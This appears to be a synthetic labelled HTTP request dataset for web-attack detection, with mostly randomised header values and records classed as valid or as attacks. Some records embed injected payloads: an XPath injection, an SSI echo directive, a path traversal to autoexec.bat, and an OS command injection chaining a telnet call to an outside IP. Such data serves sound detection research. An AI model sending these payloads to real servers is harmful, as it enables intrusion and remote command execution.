UA-Pixels: 272x609
Via: FTP/3.3 252.233.63.73, 4.1 164.88.161.36, FTP/6.2 62.196.73.123
Transfer-Encoding: gzip
Upgrade: ero/9.1, efreh/0.0
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 5433664
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 938
Start - Id: 19322
class: Valid
GET /er2Jrk/hXb3ED9MEygT6P/o_5g__xxH-dxdD75LBf/3m38iyaneah/1_rYYc/JPpAP.jsp?ebal=804&4zscxBu-as=o%26o+%5Bpdh+perlC&kIC3npasswd=404944&ruoorslrO=71424&4cuwp-Hh_V6=1&oBheAoct8Hmhn=13842 HTTP/1.0
Host: 93.58.197.64
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-cyrillic, x-mac-cyrillic;q=0.7
Accept-Encoding: compress, compress, identity, deflate;q=0.9
Accept-Language: irdlswi-u, e-htdm;q=0.1
Cache-Control: no-store
Client-ip: 33.79.28.5
Cookie: ptTcMemb=9Gym;8In5uteted3z=i;EAletafahr4hfe=cgexec+p;rppseddw=truerEIatLs;shautaov5rexdsl=wamxrhddm(te;rEoo=06
Cookie2: $Version="589"
Date: Wed, 18 Aug 04 12:28:02 UTC
ETag: W/"PBlJtQQxJPqqifEFl96U"
Expect: o4rseuf
From: ab7O@nnwAe.gov
If-Modified-Since: Sat, 01 Apr 06 18:38:29 UTC
If-Unmodified-Since: Tue, 07 Jun 05 01:32:46 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 30 Mar 04 04:46:13 GMT
Max-Forwards: 340
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM b25pYXJlaXRpbGMwbmNkdnRzb2Fjc2RvNml0bWlSZXNobGxsaWVkSHBuaQ==
Authorization: eowNin hunn5oo9=e2eLant
Range: 32-,34539-5523,215-7
Referer: /tapceot.ace
TE: gzip;q=0.2,trailers,trailers
Trailer: Accept
User-Agent: Ohtece714lu
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 5443x8172
Via: FTP/0.2 87.119.135.170:60148
Transfer-Encoding: gzip
Upgrade: sahcq/0.1
Warning: 333 161.38.217.77 "ytiqpMa5" 
X-Forwarded-For: 83.53.98.240
X-Serial-Number: 0947873125180577061
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 19322
Start - Id: 35575
class: XPathInjection
GET /ktEkAL@-p8bvHLrwQ6/uOVwJ1dgG/ome/oOUCva-hw_2BLJdqP/btaclnaT/eTNl/a1n5UBMbHNfeC/sf4/hs.AIXE/wAiuw/eDiW7imc0.jsp?tApAouul=anevaleTi&Nipeernhiar=itg&rsregoEr8ehci=tartoseo&5iwarlf8sogi=cCJTla1QScaB&e2ecmvMIY1=984&tuccr2tQ=1Ena1&dotd1jart=42%2Furit%2Frlzn0%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D498%5D++++or++%273i4c%27++%3D%27&ghh0unAo=45047188&ry1ikomedtldt=o7dvt&os14mun2nt3=643091&aujhwhnrsafRe=irhaTbaeio&eoIebeeihevoou=ggelprhtelnetq%26&pfaasn6ce=s2ma5q%40 HTTP/1.0
Host: 31.8.10.1
Connection: ri2ozhe
Accept: text/html, video/*;q=0.5
Accept-Charset: windows-1252;q=0.2, windows-1251, big5;q=0.7
Accept-Encoding: deflate, compress, gzip;q=0.5
Accept-Language: 6e6rp-eystTe;q=0.7
Cache-Control: max-stale
Client-ip: 252.234.242.120
Date: Tue, 09 Aug 05 18:58:12 UTC
Expect: 100-continue
If-Modified-Since: Mon, 23 May 05 22:45:58 GMT
If-Unmodified-Since: Wed, 11 Apr 07 13:44:10 UTC
If-Match: *
If-None-Match: "QJK7npHPtAxHOjB"
Max-Forwards: 245
MIME-Version: 1.5
Pragma: no-cache
Authorization: Basic dXk2aHBudTpveTV4aXJ1eQ==
Referer: http://www.thlRmh.be/ttsB.php4
User-Agent: IcxwmTaiattbratrsy2e
Via: 7.1 29.228.83.21, FTP/8.2 www.SbhuheOo.css
X-Forwarded-For: 245.111.237.199
----: -----------------------------------

null

End - Id: 35575
Start - Id: 14642
class: Valid
GET /teeeec8rvtT/K_PnBD/q8YGl4sgL06Wqhax/tepUR.f8Xb5TtGN1mKBl/3bPxpassthru.jpeg?gi=05owsutasreitoc&aeue6k0ri=e3xeoImnph-rr&ianoFah1=11235221&xnigeeioteyilxa=%7Ce&me2ce=l%7Cnph-uri&tnise5hSgIE=av HTTP/1.0
Host: 14.225.22.170
Connection: close
Accept: application/x-tar;q=0.5, audio/x-wav
Accept-Charset: x-mac-arabic, x-mac-roman, cp-936;q=0.9, iso-8859-8-i, iso-8859-5
Accept-Encoding: 
Accept-Language: kcfaeseg-pnju2P;q=0.1, onguuf-tSs;q=0.8, clacasme-MthNceRe;q=0.0, aae3ephe-mhShaa1
Cache-Control: no-store
Client-ip: 128.26.226.174
Cookie: 0oirm=5588141
Cookie2: $Version="4"
Date: Sun, 31 Jul 05 07:13:23 GMT
ETag: W/"faJfzJ4Nmaa_tgZtHiN5"
Expect: oaakn=Irela;tEn1
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Wed, 07 Jun 06 19:39:49 UTC
If-Unmodified-Since: Thu, 06 May 04 13:23:12 GMT
If-Match: "_UhHONFY_GhciwVa-50O"
If-None-Match: *
If-Range: *
Max-Forwards: 77
MIME-Version: 1.8
Pragma: eoelxtN='ka7mcn'
Proxy-Authorization: Digest uri=/iakeia/rswe/dxtinpub/hbcHO/eFlahsoe.jpeg
Authorization: NTLM ZXdHZWVoYngwUXNhYWd1QWRkZXJiRWhlc3VyYWJmZWdBb3llbmdl
Range: 452-
Referer: /rp2ccw/37acsenh/cntogrre.js
TE: trailers,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.9 (compatible; MSIE 9.7; Win 9x; co9flpeurd; r1ptjw65t; aoedaCot)
UA-CPU: x86
UA-Disp: 1652,237,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 557x7129
Via: FTP/1.0 1.66.217.9, HTTP/2.3 www.Raas3hIn.shtml, 1.3 www.rortn.shtml
Transfer-Encoding: gzip
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 093 www.ed1gi3a.shtml:52 "snve" 
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 29846910
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14642
Start - Id: 13236
class: Valid
GET /ssoeasolA/p3Rgpal/sB6_7HjkS8/rix/QwXotelnetR.y.EcC7V/tVmoehfpw2ifnNd/g7nharw6ewLmnda/2lYo9V-3a/fahjdWdYouBZIAZg/uuMw.css? HTTP/1.1
Host: 65.36.109.164:80
Connection: tpockg
Accept: audio/*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 249.6.232.247
Cookie: ha9aehjbs7=5jfrom;as2sudEe=rceddq2n6objectaennh
Cookie2: $Version="9"
Date: Mon, 12 Feb 07 09:28:34 GMT
ETag: W/"6JCDvI-kKr1dGTKJuW"
Expect: rqlmah
From: n7Oyrrss@th5Bs.cz
If-Modified-Since: Fri, 01 Sep 06 03:43:00 GMT
If-Unmodified-Since: Sat, 15 Oct 05 13:13:21 CET
If-Match: *
If-None-Match: *
If-Range: "KbRPVEq_lonzPOigDH"
Max-Forwards: 6
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: oltt icps=utniXm
Authorization: 1rsMut ot8ob=edsii
Range: 16-5
Referer: http://iec9aah2.fr/ogaTa.sh
TE: deflate,deflate
Trailer: Pragma
User-Agent: wnssoTada (az8HyzxA.t; ovtI5.5mj; uvsFcyiodP; rEGIAe-Ep)
UA-CPU: MIPS
UA-Disp: 2503,069,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2344x540
Via: HTTP/3.6 115.167.156.91, HTTP/4.5 www.rifmdn.html, 0.0 65.93.133.204
Transfer-Encoding: deflate
Upgrade: cdmd/1.3, tr0h/8.6, nesh/6.4, qnH/1.5, naAil/7.8
Warning: 652 www.rk2uis6.htm:23049 "elri5reurr" 
X-Forwarded-For: 112.1.79.197
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13236
Start - Id: 39267
class: SSI
GET /bhssreip/tedfbKrl0fvtoTD49L/4echo18aNmNZ/f2fu/iqs9noieoxWt/th2rseh4xzigNs/0Tc4H9s/zA.cgi?obmmrrtmlfzrej=cat1tixed&nhrnszinooi2urN=31&teem6roD=uwcisQ6&msmeobrhtrseo0s=lzAnMe&bTHJ=s%25&niama7e3ha=%26tantIrnh170gbacceptyru&rrbol=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&tiiqh=tlY&is4rA8=u+bib&pn=7&Esr2=i%3Fl4n2n+&er0LlFp=dzinsert%3Anwh3formmbd%29e+ea&iagiVstsVMpe=60eelike&puuelNsa8wsthc=944068 HTTP/1.0
Host: 147.92.62.27
Connection: tsAcOoht
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.5, gzip, compress, identity, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 128.247.28.202
Cookie: dntyRiqeeolrl=aw_;rdqevr4tanibyh=9377;des5tchot=03429728;eheoe2if=)tr8oeid2rt4;Af
Cookie2: $Version="1"
Date: Thu, 27 Apr 06 06:12:53 CET
ETag: "D-z96M8ycA6F5inRJv@"
Expect: tnhoioon=ntmu;ndEx1r
From: erhT@noAtt.uk
If-Modified-Since: Wed, 04 Aug 04 21:58:11 GMT
If-Unmodified-Since: Thu, 11 Nov 04 22:47:46 CET
If-Match: *
If-None-Match: "RwjmJJj2ALUSTD7yxPQz"
If-Range: "eNsAdT4@AgjSOKUY9at"
Max-Forwards: 599
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM dGs2bnNEZXBhN2h0dG5ldlFCbnlkQXN0c25tcmFrb1B0YXVzbXlJbm9paFBsaTE=
Authorization: Basic b2lvcjpmcnRo
Range: 864-,5323-,-8736
Referer: http://www.garSo1e.biz/tEepseh.mdb
TE: gzip,trailers
Trailer: Expect
User-Agent: mvep/5.2.2
UA-CPU: MIPS
UA-Disp: 3603,824,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8684x662
Via: cie/3.3 www.orese.png, FTP/8.6 www.i8ztrlgc.jpeg:58, EGe/5.0 5.55.212.173
Transfer-Encoding: compress
Upgrade: etsi/0.2, 42Nn/6.7
Warning: 014 58.200.111.202 "ltrIo" 
X-Forwarded-For: 237.101.171.41
X-Serial-Number: 2940498240401251
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39267
Start - Id: 43598
class: OsCommanding
GET /xoacv9.mdb?hfDmcmowua=aRds&unmtrEn2epaamt=+-u%7EtechodTl%5D&sdnseairyRoc18=hsrloqmAzl.&lCaAr3er9breue=apn&4l8dah=Veoevallma&ci2r4roe8n=eGDdFkEhM7&zfhTlucthnw=n7FbZ3BDkFWQ&ooRnc9S7fkciet=49785&1nzutannesnd=%22+++++%3B++++telnet+++++22.124.245.175++++80++++%3B&Io7EgTigoan8fe=rtcobject%26fnusrihrt%5D1c HTTP/1.0
Host: www.ufssueuhs.fr
Connection: close
Accept: */*;q=0.0
Accept-Charset: koi8-r;q=0.0, iso-8859-6
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 229.233.28.110
Cookie: sRsvmgtnst=hsihn1ah2eiwst;ew4ue9as=6;eaa=ebalinkh mochaso3&;crneafgr1sEHsr=eo-yYlT4hA;bt63osh3=516
Cookie2: $Version="7"
Date: Wed, 05 Jul 06 18:14:01 UTC
ETag: "GBRfJtdKze1.lU3kgC"
Expect: eh9i
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Fri, 03 Nov 06 17:18:37 CET
If-Unmodified-Since: Wed, 12 Apr 06 20:17:31 CET
If-Match: *
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: Tue, 27 Oct 09 11:15:47 UTC
Max-Forwards: 045
MIME-Version: 5.4
Pragma: a9tSer=hglmds
Proxy-Authorization: Basic ZmxqY3lhaXA6dHNyZXdl
Authorization: sqem rptnhae=gV0onh3a
Range: -097
Referer: http://sege.net/hsaqlazr/yoo8.doc
TE: gzip,chunked;q=0.4,chunked;q=0.8
Trailer: Range
User-Agent: snOdd3uUnc
UA-CPU: PowerPC
UA-Disp: 084,5683,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 604x8561
Via: 7.4 156.104.50.213, HTTP/3.8 73.97.5.179, FTP/2.3 www.eelhgss.js
Transfer-Encoding: gzip
Upgrade: wyme/7.1
Warning: 888 www.nazwap.css "n5ewrsqhebhsof" "Mon, 16 Jun 08 15:04:37 CET"
X-Forwarded-For: 25.170.198.152
X-Serial-Number: 1254807333960
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 43598
Start - Id: 45679
class: PathTransversal
GET /ihlab90ynfstneto/sNrLjj-RR4QUzXkTP4Co/idtldbnsiofayfht5e/nYE/eqb08hzeSurdhe/iRWWO/_bbhq/stepanhonvi/iAqhbCZNjRtM.cfm?pTf=94634455&HkqqcQG=1&nytEzFoeyydGso=e%7Esmxd%5Dh&eSshh1hhliw=Ttaaccess_logpunphrv%7Ern&t6=ltYdocumentaeaen&15@xmlH@=%5Cautoexec.bat&sBdAr=f8P6d%40&nxaixooel=scanEr HTTP/1.1
Host: www.twmh.org
Connection: jQRasa
Accept: audio/basic, audio/basic;q=0.9
Accept-Charset: windows-1253, isiri-3342
Accept-Encoding: compress;q=0.0, identity;q=0.0
Accept-Language: awi-uiofsEP;q=0.2, i5hr-qAt, eeheoyeo-oge, anksAt-Ia;q=0.9
Cache-Control: evasomac=S
Client-ip: 10.24.0.201
Cookie: of=49
Cookie2: $Version="61"
Date: Mon, 28 Sep 09 04:32:43 CET
ETag: "oITd6gpcm.9INtKUBAA"
Expect: bEeiah5h=l1sAo
From: esIpsioy@eehlxsang.it
If-Modified-Since: Sun, 02 Aug 09 20:39:00 CET
If-Unmodified-Since: Sat, 03 Sep 05 24:00:47 GMT
If-Match: *
If-None-Match: *
If-Range: "t7pG45miEvj2R@-_i"
Max-Forwards: 302
MIME-Version: 9.9
Pragma: srokA='u'
Proxy-Authorization: Digest cnonce="vhio"
Authorization: Basic cmVnR3Jlbm46c21hYWs=
Range: -934,-807,-703421
Referer: /miWuohe/balifetw/iasI/ntesoi.gif
TE: gzip;q=0.2,chunked;q=0.3,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.9 (compatible; MSIE 0.8; Linux i586; UWih; blfece6dho)
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 488x430
Via: deee/4.1 www.9eohup.png
Transfer-Encoding: deflate
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 227 16.42.111.183 "as3aaqiao" "Mon, 07 Jun 04 08:18:13 CET"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45679
Start - Id: 9617
class: Valid
GET /mU8@aM6eqzaZOP9/eJGSth/eUqohi5wi6mh5snJylb/sIRaSG/lmtasnfStdieayliov/uH-N@3ccyVxFYxiU/NskqlogelSstyle/tmaAoatwaoen/kvr2t7y5ieY2i/eyrndyampatsaIntc/coGpkdmWfUbsqQ1/pOhETL.html? HTTP/1.1
Host: 40.52.152.43
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342
Accept-Encoding: *;q=0.3
Accept-Language: ane-y;q=0.0, bDo3n54-2Aah
Cache-Control: no-transform
Client-ip: 111.185.54.181
Cookie: 6aaoyu1jljA=-tbonsamebz\;otAinte=p2ylGQV8VZ;oyeEhegteftknss=e6InRxLT;replaceNaSmaillw0T=13;edCmi=tesle;2sdZxM-_=andi|
Cookie2: $Version="87"
Date: Tue, 14 Jun 05 08:45:56 CET
ETag: W/"K4@O.cegRPvtQa-Yp"
Expect: ibz2=ephse
From: yiJqeaa@9hauhsGph.fr
If-Modified-Since: Wed, 24 Mar 10 09:51:09 CET
If-Unmodified-Since: Mon, 23 Jul 07 11:02:36 GMT
If-Match: "EDCTHXF5H9aLswjr"
If-None-Match: "Np28iy88WEhQ3q3"
If-Range: Thu, 20 Apr 06 14:34:33 CET
Max-Forwards: 238
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM aGlpZVJlaHFpc201ZUVsVTkwcnJVeWNvZXNhZDQxY2loUmR3MGNvdGQ=
Authorization: Digest nc=A0E8816f
Range: -72733
Referer: http://ncnrh2.com/w2oihd/iEiegnwd/boRex.dll
TE: trailers,trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/9.7 (compatible; leeea; Unix; gkln; iwaynn; ieomil)
UA-CPU: Sparc
UA-Disp: 8659,744,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7520x0183
Via: ihp/7.3 www.TrHu.js, HTTP/8.8 www.iadd.htm:31
Transfer-Encoding: compress
Upgrade: bcr1b/9.3, ol1eo/8.4, etne/3.1, Bs3rt9/5.7, aio/1.0
Warning: 004 www.qaG5rro.jpeg "9mp7el34osnrooE0a" "Sat, 23 Aug 08 06:38:14 CET"
X-Forwarded-For: 127.233.244.196
X-Serial-Number: 0359869
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9617
Start - Id: 33211
class: Valid
PUT /sT@7VSxu/t1Z2.z_dropG4e/sOVHpWsaSbz44GRFj/osrRciyr0cpenlfa/gjSv.cfm? HTTP/1.0
Content-Length: 190
Content-Language: e,eho
Content-Encoding: deflate
Content-Location: http://www.iFA3oLj.ch/slc8wea/loraen/aNrste/oa5adg1a.gif
Content-MD5: dWZiYW5BdDNOcERyOW15dA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 May 06 23:33:16 CET
Last-Modified: Sat, 26 Mar 05 15:56:38 GMT
Host: www.rlkeiloiv.it
Connection: close
Accept: */*;q=0.9
Accept-Charset: euc-jp, iso-10646-ucs-2;q=0.2, iso-8859-6, x-mac-ce, iso-8859-1;q=0.3
Accept-Encoding: *
Accept-Language: ie-tErae;q=0.2, nt5seop-iott;q=0.7, re7me-nTy;q=0.9, 56ss-0drrtT, i-eoTialho
Cache-Control: max-age=92
Client-ip: 204.25.78.12
Cookie: ilotuteaZn8=)iihio/n3fajot)0;tmhhIerrp4e=939970;aN7o=&ig
Cookie2: $Version="95"
Date: Fri, 02 Mar 07 01:42:26 UTC
ETag: W/"kRo5RA1ZFcAu3vbV"
Expect: a25er0aa
From: na2aepi@d4eieegeg.fr
If-Modified-Since: Thu, 21 Sep 06 08:22:36 UTC
If-Unmodified-Since: Tue, 16 Oct 07 04:20:22 GMT
If-Match: "Wzw2FqSisvv4mf9pJPh"
If-None-Match: "25ecNckVWMPm6uQoiRc"
If-Range: Thu, 20 Mar 08 22:50:25 UTC
Max-Forwards: 51
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic aGFpaWg6ZHdiZGN2ZQ==
Range: 5-,5-93172,41903-8251
Referer: http://te7ishaW.fr/p0aizy6/poineO.cfm
TE: trailers
Trailer: Connection
User-Agent: ejmulhri6/6.3.5
UA-CPU: MIPS
UA-Disp: 3198,1175,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2180x8766
Via: HTTP/9.2 www.gsmyw.htm, 6.1 www.be6auSrs.js:7472, or3os/0.4 www.desEohmo.gif:25
Transfer-Encoding: neee; rheteaH=thk56Ftb
Upgrade: neatde/1.7
Warning: 077 www.beaAsoet.png:0598 "ynai" "Tue, 22 Apr 08 08:27:50 GMT"
X-Forwarded-For: 83.167.179.226
X-Serial-Number: 6725811933666552
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

taPwnvsssi9ge4a=89823580&a7s=form4Mg tn&lQhfeHsgbnIslr=ofetc &iVwuy7ie=ollor&t9coi2abresUnlt=08236&lD.eHObyF=1ofetdnMek&8nknzoh=aXS&wherev-sock_streamA.=napHwis&nw7r=ehzc&fo=ocYa&7sEGr=hY4Hh

End - Id: 33211
Start - Id: 4692
class: Valid
POST /i2pjl2r/tEcc/_j@imjspasswdq-KbQ.htm? HTTP/1.0
Content-Length: 276
Content-Language: osn
Content-Encoding: gzip
Content-Location: http://www.sntnel.uk/tbbaof/3mhoq2ih.php3
Content-MD5: aXNwamg1ZUE4cjVxZWg0Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 26 Nov 08 12:52:18 GMT
Last-Modified: Wed, 11 Mar 09 05:43:25 GMT
Host: 98.216.15.254
Connection: keep-alive
Accept: video/*;q=0.9, text/xml
Accept-Charset: iso-8859-3;q=0.7, iso-8859-4;q=0.8, big5;q=0.5
Accept-Encoding: 
Accept-Language: i-eemuB, tjme-4pqbg0c;q=0.2, rph3h-do;q=0.9, eE-lnssetse, 2aee-iraEss;q=0.6
Cache-Control: min-fresh=43
Client-ip: 110.67.81.196
Cookie: hgu=sagjtehts4;st=608402;RUWsX=0810;atteseitltdNHo=t;etaeRoDafemtesm=318;e0tunzn=12684597
Cookie2: $Version="2"
Date: Sat, 01 Nov 08 10:44:34 CET
ETag: W/"_O3Ht7yCAykxhZ_"
Expect: 100-continue
From: sioaA@hwxrt2des.de
If-Modified-Since: Sat, 07 Nov 09 10:16:32 CET
If-Unmodified-Since: Fri, 07 Nov 08 08:11:49 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Mar 10 04:13:50 CET
Max-Forwards: 061
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: 1sso Eodpor=eor82e
Authorization: niymn ke2ermn=ullnoe
Range: 511-,489649-576168,-523
Referer: /iaoshe7/8wbsifO/ps8mh/ti5eS/haene.dll
TE: chunked,gzip,trailers
Trailer: Expect
User-Agent: Mozilla/5.8 (Windows; U; Windows NT 1.9; to-if; rv:4.3.9) Gecko/23529429
UA-CPU: 68000
UA-Disp: 199,143,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5828x404
Via: 6.5 227.232.158.172, FTP/5.3 254.199.123.109:88034
Transfer-Encoding: gzip
Upgrade: 0cqraS/8.2, drd/8.3, srxac/2.7
Warning: 536 10.92.102.202 "5tc0ut6" "Wed, 19 Aug 09 01:08:40 GMT"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 263274968971
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

mrcbkl=743829&idjcs=85956848&2Dhfwindow.openKO8kXI_=n1ds-ocue9aoTd&xwsoiraryEHuee=00234&ejaeuanksoe8ntF=itlRr46fe&trlmOm8eeeoaeav=iish&skg9Tcoepibp=0695306466&Ctofutt0t=9En&1sS=UptkbZeoe%uadminformwnsi&Ii5i2jconoohi=rt&9ac4nnUesirmaii=jNne&FWw10ay=h&4rr=w6i&yoedaynmocTAoe=1

End - Id: 4692
Start - Id: 19962
class: Valid
GET /WJiQZypE9nullLc/9dB0AdeleteJvQOXi.php4?idj6Ngartet=762&DceU=1xNBQ&BstnmOids5e=siN%3A%5BstwctuptOrgaeys&ce5hnst=02&havingAFUb.Lh2=jrse9teftaN&rp=roaoeeCoeyrk1eH&hlxiWeTirj4Bro=iqEeaJMV7&rN=vce0qFpS&ennLgaou=uaaa5u2ebrridnpvo&eaEtta=%3ANencihprl%27se1knE&h2GNUrcpselect8-_=83943502&j1aserelgex=ttloLmie-&Tubatw=m7s&lw8tCc=e%24acmd HTTP/1.1
Host: 161.168.83.206:554
Connection: 6eudet
Accept: video/mpeg, audio/x-wav;q=0.1
Accept-Charset: windows-1258, cp-936;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: neG-I, StltOqx-ise6
Cache-Control: max-age=902
Client-ip: 160.212.207.190
Cookie: eeTsedwse8o=&imgc;ngn10rtnsyn=40101;2nnmaexanout=2
Cookie2: $Version="914"
Date: Tue, 13 Jan 09 18:56:04 UTC
ETag: W/"3DRt5KcBFTnUysgxUD6"
Expect: 100-continue
From: ev5k8ia@ptMesO.net
If-Modified-Since: Sun, 16 Sep 07 04:56:12 GMT
If-Unmodified-Since: Tue, 25 Oct 05 02:46:21 CET
If-Match: "lpvrjb4RVtgxn9o"
If-None-Match: "ckhkDpmpz6KyheJKp"
If-Range: Mon, 26 Apr 10 21:43:46 CET
Max-Forwards: 86
MIME-Version: 9.5
Pragma: mria='nnr'
Proxy-Authorization: Basic aGJlYXR4c2k6VHIzZg==
Authorization: neea nhdeano=too8y
Range: 9-166,607515-,166-662139
Referer: http://odehsya.fr/pmsmMxst/Ueerw/itgt/fmc7hem/3afheoh.mp3
TE: trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 9.8; ja-We; rv:7.9.7) Gecko/14826614
UA-CPU: StrongARM
UA-Disp: 101,9405,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 772x118
Via: 8.5 132.28.42.97:55, 3.3 118.161.246.254, 4.5 113.250.217.87
Transfer-Encoding: tnr6; r4ceSb=0qmdRe
Upgrade: scjah/2.9, rqic/8.5, Eucg/8.4, 50h/6.8
Warning: 269 www.sio9tfe.jpeg "ertsEceeNmilreasie" 
X-Forwarded-For: 129.122.159.101
X-Serial-Number: 81008512960196254
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19962
Start - Id: 28193
class: Valid
GET /fh0tRtr/znc2f0HNjTM/yRBmNqoxK8a.XdYi4f/tp3Cx/tler/wgetbQ.ENmS.png?rV=616954102&uIgior4oM=ckDaYs0cjuzqyd&xeeAs49L=cWv3sO3Vp&dMT=iacchrlyodyneots&DGQVhnc=7816 HTTP/1.0
Host: 153.12.210.103
Connection: close
Accept: text/xml;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: bghn7fe-s
Cache-Control: no-cache
Client-ip: 208.143.114.201
Cookie: QJRldKmr=09;etg=n5HPO;tesw=oSIwLc;ggot6qotestyfnn=idaean;snRy4k8noevum1e=t46jSm
Cookie2: $Version="5"
Date: Tue, 25 Dec 07 12:10:37 GMT
ETag: "HAKS-GZxAfZFJzHFo@3"
Expect: 100-continue
From: haidri@m6zcet8gA.ch
If-Modified-Since: Wed, 02 Apr 08 08:06:32 UTC
If-Unmodified-Since: Fri, 26 Jun 09 01:24:56 GMT
If-Match: *
If-None-Match: "ZmxW-M0M5dHBfH5HT"
If-Range: "FO2bi@mhpNrvBJbR"
Max-Forwards: 7758
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest qop=Rnunev
Authorization: eto8 uEecs=rhne5mt
Range: -569,-376,5-
Referer: http://www.ileet.uk/eqax08bn/ltt4/woti.nsf
TE: deflate;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/5.3 (compatible; Konqueror/7.3; Open BSD i586; eoensbzo0; GNiztsuajt; rsEhe)
UA-CPU: x86
UA-Disp: 0207,3028,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8070x456
Via: FTP/4.8 103.22.55.55, 5.5 58.59.90.181:64, 1.5 38.135.232.25
Transfer-Encoding: compress
Upgrade: trp/1.7, uirtns/0.1, ein/9.5, nhk0a/7.9
Warning: 941 204.125.32.112 "Rsze" 
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 3105222216298089545
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28193
Start - Id: 16436
class: Valid
GET /lvidglaeNmIWtugscct/itvewyA.msf?DdeuuPtKedbgoaa=s8u&st2SdfnaEDeooi=ainsertO2thcmi HTTP/1.0
Host: 164.199.52.95:388
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: iso-10646-ucs-2, x-mac-chinesesimp, iso-8859-7, x-mac-chinesesimp, isiri-3342;q=0.2
Accept-Encoding: identity, deflate
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 50.79.47.144
Cookie: 9e7i1trov0e4r92=6304;JVGf=5xnnh;aEotitirS0rr=a-nE eautoexecftresat
Cookie2: $Version="01"
Date: Mon, 12 Oct 09 17:06:51 CET
ETag: "Cf3yg0dSKGToLbNJ1_2"
Expect: 100-continue
From: m3nr@3eiatljua.it
If-Modified-Since: Fri, 01 Oct 04 15:30:59 GMT
If-Unmodified-Since: Wed, 06 May 09 04:15:36 UTC
If-Match: *
If-None-Match: "iAcNx3Kj8Lo.tllnk"
If-Range: Mon, 25 Jan 10 18:58:22 GMT
Max-Forwards: 4
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest cnonce="seoeJcg"
Range: -4,1-
Referer: /ptHylin/orfn/hibahF.cgi
TE: chunked;q=0.0,trailers,gzip
Trailer: Date
User-Agent: Mozilla/1.0 (compatible; Konqueror/3.6; Solaris; daIs)
UA-CPU: StrongARM
UA-Disp: 437,939,8
UA-OS: Windows NT
UA-Color: color16
